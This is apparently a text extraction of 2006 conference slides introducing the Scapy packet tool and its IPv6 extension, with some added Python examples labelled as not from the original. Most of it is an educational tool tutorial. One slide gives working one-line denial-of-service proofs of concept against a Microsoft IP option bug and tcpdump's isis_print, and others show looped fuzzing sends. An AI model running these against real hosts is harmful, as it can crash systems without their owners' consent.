The Scapy Concept | Scapy + IPv6 = Scapy6 | Fun Security with Scapy6
Scapy and IPv6 networking
Philippe BIONDI Arnaud EBALARD
phil(at)secdev.org / philippe.biondi(at)eads.net
troglocan(at)droids-corp.org / arnaud.ebalard(at)eads.net
EADS Corporate Research Center — DCR/STI/CIT Sec lab
Suresnes, FRANCE
Hack In The Box 2006
P. Biondi / A. Ebalard Scapy and IPv6 networking 1/100
Beware! IPv6 is coming, and it is not happy!
The everything is connected world needs IPv6, but
IPv6 sometimes looks simple and it is complex
Many implementation bugs are waiting undercover
Best practices painfully acquired for IPv4 are not there yet for IPv6
Let’s make something cool and we’ll secure it later mentality
We need test tools to
Emerge best practices
Hunt bugs
Demonstrate flaws
Show actual risks
Outline
1 Introduction to the network testing tools world
2 The Scapy Concept
    Concepts
    Quick overview
    High-level commands
    Custom stuff with Scapy
3 Scapy + IPv6 = Scapy6
    IPv6
    Scapy6 capabilities
    ICMPv6 Support
4 Fun Security with Scapy6
    Playing with Routing Headers
    Quick OS support summary
5 Conclusion
Quick goal-oriented taxonomy of packet building tools
Packet forging, Sniffing, Testing, Scanning, Fingerprinting, Attacking
Many programs (sorry for possible classification errors!)
Sniffing tools
ethereal, tcpdump, net2pcap, cdpsniffer, aimsniffer, vomit, tcptrace, tcptrack, nstreams, argus, karpski, ipgrab, nast, cdpr, aldebaran, dsniff, irpas, iptraf, . . .
Packet forging tools
packeth, packit, packet excalibur, nemesis, tcpinject, libnet, IP sorcery, pacgen, arp-sk, arpspoof, dnet, dpkt, pixiliate, irpas, sendIP, IP-packetgenerator, sing, aicmpsend, libpal, . . .
Many programs
Testing tools
ping, hping2, hping3, traceroute, tctrace, tcptraceroute, traceproto, fping, arping, . . .
Scanning tools
nmap, amap, vmap, hping3, unicornscan, ttlscan, ikescan, paketto, firewalk, . . .
Fingerprinting tools
nmap, xprobe, p0f, cron-OS, queso, ikescan, amap, synscan, . . .
Attacking tools
dnsspoof, poison ivy, ikeprobe, ettercap, dsniff suite, cain, hunt, airpwn, irpas, nast, yersinia, . . .
Most tools can’t forge exactly what you want
Most tools support no more than the TCP/IP protocol suite
Building a whole packet with a command line tool is near unbearable, and is really unbearable for a set of packets
=⇒ Popular tools use templates or scenarios with few fields to fill to get a working (set of) packets
=⇒ You’ll never do something the author did not imagine
=⇒ You often need to write a new tool
But building a single working packet from scratch in C takes an average of 60 lines
Combining techniques is not possible
Example
Imagine you have an ARP cache poisoning tool
Imagine you have a double 802.1q encapsulation tool
=⇒ You still can’t do ARP cache poisoning with double 802.1q encapsulation
=⇒ You need to write a new tool ... again.
Most tools can’t forge exactly what you want
Example
Try to find a tool that can do
an ICMP echo request with some given padding data
an IP protocol scan with the More Fragments flag
some ARP cache poisoning with a VLAN hopping attack
a traceroute with an applicative payload (DNS, ISAKMP, etc.)
Decoding vs interpreting
decoding: I received a RST packet from port 80
interpreting: The port 80 is closed
Machines are good at decoding and can help human beings
Interpretation is for human beings
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered. WRONG! It was a host unreachable error. The firewall wanted the packet to go through, but no host answered the ARP request.
Port 113 is closed. WRONG! The port is actually open on the box, but the router before it spoofed a TCP reset.
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 ......@.C.......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
Did you see ? Some data leaked into the padding (Etherleaking).
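Added example (not from the original slides): a standard-library check that decodes the frame shown in the hex dump above, finds where the IP datagram says it ends, and returns whatever non-zero bytes sit in the Ethernet padding after it. The function names are hypothetical; handling of 802.1Q tags and IPv6 goes beyond the IPv4 case on the slide.

```python
import struct

# Frame bytes transcribed from the hex dump on the slide
# (60 bytes: the minimum Ethernet frame size, captured without FCS).
SLIDE_FRAME = bytes.fromhex(
    "0001 4321 1d3f 0002 413d 4b23 0800 4500"
    "001c a5d9 0000 4001 43a8 c0a8 0801 c0a8"
    "080e 0000 16f6 e909 0000 0000 0000 0000"
    "0000 0000 0000 0000 13e5 c24b"
)

ETHERTYPE_VLAN = 0x8100
ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_IPV6 = 0x86DD


def l3_end_offset(frame: bytes) -> int:
    """Return the frame offset at which the IP datagram claims to end."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    (ethertype,) = struct.unpack_from("!H", frame, 12)
    offset = 14
    while ethertype == ETHERTYPE_VLAN:           # skip stacked 802.1Q tags
        if len(frame) < offset + 4:
            raise ValueError("truncated 802.1Q tag")
        (ethertype,) = struct.unpack_from("!H", frame, offset + 2)
        offset += 4
    if ethertype == ETHERTYPE_IPV4:
        if len(frame) < offset + 20:
            raise ValueError("truncated IPv4 header")
        (total_len,) = struct.unpack_from("!H", frame, offset + 2)
        if total_len < 20:
            raise ValueError("IPv4 total length shorter than a header")
        end = offset + total_len                 # total length covers the header
    elif ethertype == ETHERTYPE_IPV6:
        if len(frame) < offset + 40:
            raise ValueError("truncated IPv6 header")
        (payload_len,) = struct.unpack_from("!H", frame, offset + 4)
        end = offset + 40 + payload_len          # payload length excludes the header
    else:
        raise ValueError("not an IP frame")
    if end > len(frame):
        raise ValueError("IP length exceeds the captured frame")
    return end


def padding(frame: bytes) -> bytes:
    """Bytes the sender appended after the IP datagram to reach minimum size."""
    return frame[l3_end_offset(frame):]


def leaked_bytes(frame: bytes) -> bytes:
    """Non-zero content of the padding; empty when the padding is clean."""
    return padding(frame).strip(b"\x00")


if __name__ == "__main__":
    pad = padding(SLIDE_FRAME)
    print("IP datagram ends at offset", l3_end_offset(SLIDE_FRAME))
    print("padding:", pad.hex(), "(", len(pad), "bytes )")
    print("non-zero padding content:", leaked_bytes(SLIDE_FRAME).hex() or "none")
```

Run over a capture, any frame for which `leaked_bytes()` is non-empty is worth a look; hping's one-line summary never shows those bytes.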
Popular tools bias our perception of networked systems
Very few popular tools (nmap, hping)
Popular tools give a subjective vision of tested systems
=⇒ The world is seen only through those tools
=⇒ You won’t notice what they can’t see
=⇒ Bugs, flaws, . . . may remain unnoticed on very well tested systems because they are always seen through the same tools, with the same bias
Scapy’s Main Concepts
Python interpreter disguised as a Domain Specific Language
Extensible design
Fast packet designing
Default values that work
No special values
Unlimited combinations
Probe once, interpret many
Interactive packet and result manipulation
Scapy as a Domain Specific Language
List of layers
>>> ls()
ARP : ARP
DHCP : DHCP options
DNS : DNS
Dot11 : 802.11
[...]
List of commands
>>> lsc()
sr : Send and receive packets at layer 3
sr1 : Send packets at layer 3 and return only the fi
srp : Send and receive packets at layer 2
[...]
Extensible design
[Diagram: "One use" (other tools): core + 2 or 3 layers + 1 technique. "Many uses" (Scapy): core, layers, techniques, custom.]
Scapy is not monolithic
The core is responsible for packet assembly mechanisms, interactions with the kernel, etc.
The layer part describes layers
The techniques part relies on core and layers.
When the core improves, all existing layers take advantage of it.
When new layers are added, they immediately benefit from the core.
Fast packet designing
Each packet is built layer by layer (ex: Ether, IP, TCP, . . . )
Each layer can be stacked on another
Each layer or packet can be manipulated
Each field has working default values
Each field can contain a value or a set of values
Example
>>> a=IP(dst="www.target.com", id=0x42)
>>> a.ttl=12
>>> b=TCP(dport=[22,23,25,80,443])
>>> c=a/b
Fast packet designing
How to order food at a Fast Food
I want a BigMac, French Fries with Ketchup and Mayonnaise, up to 9 Chicken Wings and a Diet Coke
How to order a Packet with Scapy
I want a broadcast MAC address, and IP payload to ketchup.com and to mayo.com, TTL value from 1 to 9, and an UDP payload.
Ether(dst="ff:ff:ff:ff:ff:ff")/IP(dst=["ketchup.com","mayo.com"],ttl=(1,9))/UDP()
We have 18 packets defined in 1 line (1 implicit packet)
Default values that work
If not overridden,
IP source is chosen according to destination and routing table
Checksum is computed
Source MAC is chosen according to output interface
Ethernet type and IP protocol are determined by upper layer
. . .
Other fields’ default values are chosen to be the most useful ones:
TCP source port is 20, destination port is 80
UDP source and destination ports are 53
ICMP type is echo request
. . .
Default values that work
Example : Default Values for IP
>>> ls(IP)
version : BitField = (4)
ihl : BitField = (None)
tos : XByteField = (0)
len : ShortField = (None)
id : ShortField = (1)
flags : FlagsField = (0)
frag : BitField = (0)
ttl : ByteField = (64)
proto : ByteEnumField = (0)
chksum : XShortField = (None)
src : Emph = (None)
dst : Emph = ('127.0.0.1')
options : IPoptionsField = ('')
No special values
The special value is the None object
The None object is outside of the set of possible values
=⇒ it does not prevent any possible value from being used
Unlimited combinations
With Scapy, you can
Stack what you want where you want
Put any value you want in any field you want
Example
STP()/IP(options="love",chksum=0x1234)/Dot1Q(prio=1)/Ether(type=0x1234)/Dot1Q(vlan=(2,123))/TCP()
You know ARP cache poisoning and VLAN hopping
=⇒ you can poison a cache with a double VLAN encapsulation
You know VOIP decoding, 802.11 and WEP
=⇒ you can decode a WEP encrypted 802.11 VOIP capture
You know ISAKMP and tracerouting
=⇒ you can traceroute to VPN concentrators
Probe once, interpret many
Main difference with other tools:
The result of a probe is made of
the list of couples (packet sent, packet received)
the list of unreplied packets
Interpretation/representation of the result is done independently
=⇒ you can refine an interpretation without needing a new probe
Example
You do a TCP scan on a host and see some open ports, a closed one, and no answer for the others
=⇒ you don’t need a new probe to check the TTL or the IPID of the answers and determine whether it was the same box
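Added example (not from the original slides, and not Scapy's own API): a stored probe result, kept as couples of (sent, received) plus the unanswered list, is interpreted twice without sending anything again. The `Probe` and `Answer` classes, the addresses and the TTL values are constructed for illustration; the two surprising answers mirror the port 79 and port 113 cases from the scanner output earlier in the talk.

```python
from collections import Counter
from dataclasses import dataclass

TARGET = "192.0.2.3"      # constructed address (documentation range)
FIREWALL = "192.0.2.254"  # constructed address of the hop in front of it


@dataclass(frozen=True)
class Probe:              # hypothetical stand-in for a sent TCP SYN
    dst: str
    dport: int


@dataclass(frozen=True)
class Answer:             # hypothetical stand-in for a decoded reply
    src: str              # address that actually emitted the reply
    ttl: int              # TTL observed on arrival
    kind: str             # "SA", "RA" or "icmp-host-unreachable"


# Constructed result of ONE probe run: answered couples + unanswered probes.
ANSWERED = [
    (Probe(TARGET, 22), Answer(TARGET, 55, "SA")),
    (Probe(TARGET, 80), Answer(TARGET, 55, "SA")),
    (Probe(TARGET, 79), Answer(FIREWALL, 63, "icmp-host-unreachable")),
    (Probe(TARGET, 113), Answer(TARGET, 63, "RA")),
]
UNANSWERED = [Probe(TARGET, 25)]


def port_table(answered, unanswered):
    """First interpretation: the port/state table a scanner would print."""
    states = {"SA": "open", "RA": "closed"}
    table = {p.dport: states.get(a.kind, "filtered") for p, a in answered}
    table.update({p.dport: "filtered" for p in unanswered})
    return table


def second_look(answered):
    """Second interpretation of the same couples: who really answered?

    Flags replies sent by another address than the probed one, and replies
    whose TTL differs from the most common TTL seen from the target itself.
    """
    own = [a.ttl for p, a in answered if a.src == p.dst]
    usual_ttl = Counter(own).most_common(1)[0][0] if own else None
    findings = {}
    for p, a in answered:
        if a.src != p.dst:
            findings[p.dport] = f"{a.kind} sent by {a.src}, not {p.dst}"
        elif a.ttl != usual_ttl:
            findings[p.dport] = f"{a.kind} with TTL {a.ttl}, usual is {usual_ttl}"
    return findings


if __name__ == "__main__":
    print(port_table(ANSWERED, UNANSWERED))
    for port, why in sorted(second_look(ANSWERED).items()):
        print(f"port {port}: {why}")
```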
Probe once, interpret many: the sr*() functions
[Diagram: sr() takes an implicit packet set, sends each stimulus to the network, matches each response, and returns the result and the unanswered packets]
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 43: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/43.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 44: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/44.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 45: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/45.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 46: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/46.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 47: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/47.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>> a
< IP dst=192.168.1.1 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 48: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/48.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulation: First steps
>>> a=IP(ttl=10)
>>> a
<IP ttl=10 |>
>>> a.src
'127.0.0.1'
>>> a.dst="192.168.1.1"
>>> a
<IP ttl=10 dst=192.168.1.1 |>
>>> a.src
'192.168.8.14'
>>> del(a.ttl)
>>> a
<IP dst=192.168.1.1 |>
>>> a.ttl
64
Packet manipulation: Stacking
>>> b=a/TCP(flags="SF")
>>> b
<IP proto=TCP dst=192.168.1.1 |<TCP flags=FS |>>
>>> b.command()
"IP(dst='192.168.1.1')/TCP(flags=3)"
>>> b.show()
---[ IP ]---
version = 4
ihl = 0
tos = 0x0
len = 0
id = 1
flags =
frag = 0
ttl = 64
proto = TCP
chksum = 0x0
src = 192.168.8.14
dst = 192.168.1.1
options = ''
---[ TCP ]---
sport = 20
dport = 80
seq = 0
ack = 0
dataofs = 0
reserved = 0
flags = FS
window = 0
chksum = 0x0
urgptr = 0
options =
Packet Manipulation: Navigation between layers
Layers of a packet can be accessed using the payload attribute:
print(pkt.payload.payload.payload.chksum)
A better way:
The idiom Layer in packet tests the presence of a layer
The idiom packet[Layer] returns the asked layer
The idiom packet[Layer:3] returns the third instance of the asked layer
Example
if UDP in pkt:
    print(pkt[UDP].chksum)
The code is independent from lower layers. It will work the same whether pkt comes from PPP or from WEP with 802.1q
Packet Manipulation: Building and Dissecting
>>> str(b)
'E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x01\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%\x1e\x00\x00'
>>> IP(_)
<IP version=4L ihl=5L tos=0x0 len=40 id=1 flags= frag=0L ttl=64 proto=TCP chksum=0xf06f src=192.168.8.14 dst=192.168.1.1 options='' |<TCP sport=20 dport=80 seq=0L ack=0L dataofs=5L reserved=16L flags=FS window=0 chksum=0x251e urgptr=0 |>>
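An added example (not from the slides) that redoes the build and dissect steps above by hand with only the standard library: it parses the 40 bytes returned by str(b) and recomputes the two checksums Scapy filled in at build time. The function names are hypothetical; the byte string is the one shown above.

```python
import socket
import struct

# The 40 bytes that str(b) returned on the slide (IPv4 header + TCP header).
WIRE = (b'E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x01\x01'
        b'\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%\x1e\x00\x00')


def inet_checksum(data):
    """RFC 1071 ones' complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b'\x00'
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def dissect_ipv4(raw):
    """Parse an IPv4 header and verify its checksum."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    vihl, tos, length, ident, fragfield, ttl, proto, chksum, src, dst = \
        struct.unpack('!BBHHHBBH4s4s', raw[:20])
    ihl = vihl & 0x0F
    if vihl >> 4 != 4 or ihl < 5 or len(raw) < ihl * 4:
        raise ValueError("not a well-formed IPv4 header")
    header = raw[:ihl * 4]
    return {
        'version': vihl >> 4, 'ihl': ihl, 'tos': tos, 'len': length,
        'id': ident, 'flags': fragfield >> 13, 'frag': fragfield & 0x1FFF,
        'ttl': ttl, 'proto': proto, 'chksum': chksum,
        'src': socket.inet_ntoa(src), 'dst': socket.inet_ntoa(dst),
        'options': header[20:],
        # a header summed with its checksum field included must give 0
        'chksum_ok': inet_checksum(header) == 0,
        'payload': raw[ihl * 4:length],
    }


TCP_FLAGS = 'FSRPAUEC'  # bit 0 (FIN) first, the same letters Scapy prints


def dissect_tcp(segment, src, dst):
    """Parse a TCP header and verify its checksum over the pseudo-header."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, offres, flags, window, chksum, urgptr = \
        struct.unpack('!HHIIBBHHH', segment[:20])
    pseudo = (socket.inet_aton(src) + socket.inet_aton(dst)
              + struct.pack('!BBH', 0, 6, len(segment)))
    return {
        'sport': sport, 'dport': dport, 'seq': seq, 'ack': ack,
        'dataofs': offres >> 4,
        'flags': ''.join(c for i, c in enumerate(TCP_FLAGS)
                         if flags & (1 << i)),
        'window': window, 'chksum': chksum, 'urgptr': urgptr,
        'chksum_ok': inet_checksum(pseudo + segment) == 0,
    }


def dissect(raw):
    """Return (ip_fields, tcp_fields); tcp_fields is None for non-TCP."""
    ip = dissect_ipv4(raw)
    tcp = None
    if ip['proto'] == 6:
        tcp = dissect_tcp(ip['payload'], ip['src'], ip['dst'])
    return ip, tcp


if __name__ == "__main__":
    ip, tcp = dissect(WIRE)
    print(ip)
    print(tcp)
```

The fields that b.show() printed as 0 before the build (ihl, len, dataofs, both chksum values) come back here with the values computed at assembly time, and a single altered byte makes chksum_ok false.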
Packet Manipulation: Implicit Packets
>>> b.ttl=(10,14)
>>> b.payload.dport=[80,443]
>>> [k for k in b]
[<IP ttl=10 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
 <IP ttl=10 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
 <IP ttl=11 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
 <IP ttl=11 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
 <IP ttl=12 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
 <IP ttl=12 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
 <IP ttl=13 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
 <IP ttl=13 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
 <IP ttl=14 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
 <IP ttl=14 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>]
PS/PDF packet dump
>>> pkt.psdump()
>>> pkt.pdfdump()
[Figure: the resulting dump, each field shown next to the bytes that encode it]
Ethernet
  00 12 79 3d a3 6a    dst      00:12:79:3d:a3:6a
  00 11 43 26 48 7e    src      00:11:43:26:48:7e
  08 00                type     0x800
IP
  45                   version  4L
                       ihl      5L
  00                   tos      0x0
  00 21                len      33
  85 2a                id       34090
  40 00                flags    DF
                       frag     0L
  40                   ttl      64
  11                   proto    UDP
  3e 81                chksum   0x3e81
  ac 10 0f 02          src      172.16.15.2
  ac 10 0f fe          dst      172.16.15.254
                       options  ''
UDP
  81 1c                sport    33052
  11 ab                dport    4523
  00 0d                len      13
  77 3f                chksum   0x773f
Raw
  74 6f 74 6f 0a       load     'toto\n'
The sprintf() method
Thanks to the sprintf() method, you can
make your own summary of a packet
abstract lower layers and focus on what’s interesting
Example
>>> a = IP(dst="192.168.8.1",ttl=12)/UDP(dport=123)
>>> a.sprintf("The source is %IP.src%")
'The source is 192.168.8.14'
“%”, “{” and “}” are special characters in the format string; to get them literally, write “%%”, “%(” and “%)”
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>> sendp("I'm travelling on Ethernet ", iface="eth0")
tcpdump output:
01:55:31.522206 61:76:65:6c:6c:69 > 49:27:6d:20:74:72, ethertype Unknown (0x6e67), length 27:
        4927 6d20 7472 6176 656c 6c69 6e67 206f  I'm.travelling.o
        6e20 4574 6865 726e 6574 20              n.Ethernet.
Sending
Microsoft IP option DoS proof of concept is 115 lines of C code (without comments)
The same with Scapy:
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
tcpdump isis_print() Remote Denial of Service Exploit: 225 lines
The same with Scapy:
send( IP(dst="1.1.1.1")/GRE(proto=254)/’\x83\x1b \x01\x06\x12\x01\xff\x07\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x01\x07 \x00\x00’
)
Fuzzing: Constructive fuzzing
The fuzz() function will transform a packet into a fuzzy packet.
The fuzzy packet can be sent in a loop
Example
>>> IP(dst="target")/fuzz( UDP()/NTP(version=4) )
<IP frag=0 proto=UDP dst=<Net target> |<UDP sport=ntp dport=ntp |<NTP version=4 |>>>
>>> send(_, loop=1, verbose=0)
Fuzzing: Fuzzing by alteration
The corrupt_bytes(s, [p=0.01]) function will corrupt p% of the string with random bytes
The corrupt_bits() function will flip p% of the string’s bits
Any layer can accept those functions as transformations to be applied to the assembled layer
CorruptedBytes() and CorruptedBits() can create volatile strings randomly corrupted
Example
>>> payload="captured payload"
>>> send(IP(dst="target")/UDP()/Raw(load=CorruptedBits(payload)), loop=1)
Example
>>> send(IP(dst="target")/UDP()/NTP(stratum=1, post_transform=corrupt_bits), loop=1)
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>> rdpcap("/tmp/test.cap")
< test.cap: UDP:0 TCP:2 ICMP:0 Other:0>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 86: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/86.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
<Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
<Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=_
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>> rdpcap("/tmp/test.cap")
<test.cap: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a[0]
<Ether dst=00:12:2a:71:1d:2f src=00:02:4e:9d:db:c3 type=0x800 |<
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>> a=sniff(iface="wlan0",prn=lambda x: \
x.sprintf("%Dot11.addr2% ")+("#"*(x.signal/8)))
00:06:25:4b:00:f3 ######################
00:04:23:a0:59:bf #########
00:04:23:a0:59:bf #########
00:06:25:4b:00:f3 #######################
00:0d:54:99:75:ac #################
00:06:25:4b:00:f3 #######################
Requires wlan0 interface to provide Prism headers
Conversations
>>> a = sniff()
>>> a.conversations()
[Figure: graph of the conversations between the sniffed 192.168.8.x hosts]
PS/PDF dump
>>> lst.pdfdump()
Packet Lists Manipulation: Operators
A packet list can be manipulated like a list
You can add, slice, etc.
Example
>>> a = rdpcap("/tmp/dcnx.cap")
>>> a
<dcnx.cap: UDP:0 ICMP:0 TCP:20 Other:0>
>>> a[:10]
<mod dcnx.cap: UDP:0 ICMP:0 TCP:10 Other:0>
>>> a+a
<dcnx.cap+dcnx.cap: UDP:0 ICMP:0 TCP:40 Other:0>
Packet Lists Manipulation: Using tables
Tables represent a packet list in a z = f(x, y) fashion.
PacketList.make_table() takes a λ: p → [x(p), y(p), z(p)]
For SndRcvList: λ: (s, r) → [x(s, r), y(s, r), z(s, r)]
They make a 2D array with z(p) in cells, organized by x(p) horizontally and y(p) vertically.
Example
>>> ans,_ = sr(IP(dst="www.target.com/30")/TCP(dport=[22,25,80]))
>>> ans.make_table(
      lambda (snd,rcv): ( snd.dst, snd.dport,
      rcv.sprintf("{TCP:%TCP.flags%}{ICMP:%ICMP.type%}")))
     23.16.3.32 23.16.3.3 23.16.3.4 23.16.3.5
22   SA         SA        SA        SA
25   SA         RA        RA        dest-unreach
80   RA         SA        SA        SA
Sending and Receiving: Return first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
Begin emission:
..Finished to send 1 packets.
.*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4L ihl=5L tos=0x0 len=28 id=46681 flags= frag=0L
ttl=64 proto=ICMP chksum=0x3328 src=192.168.8.1
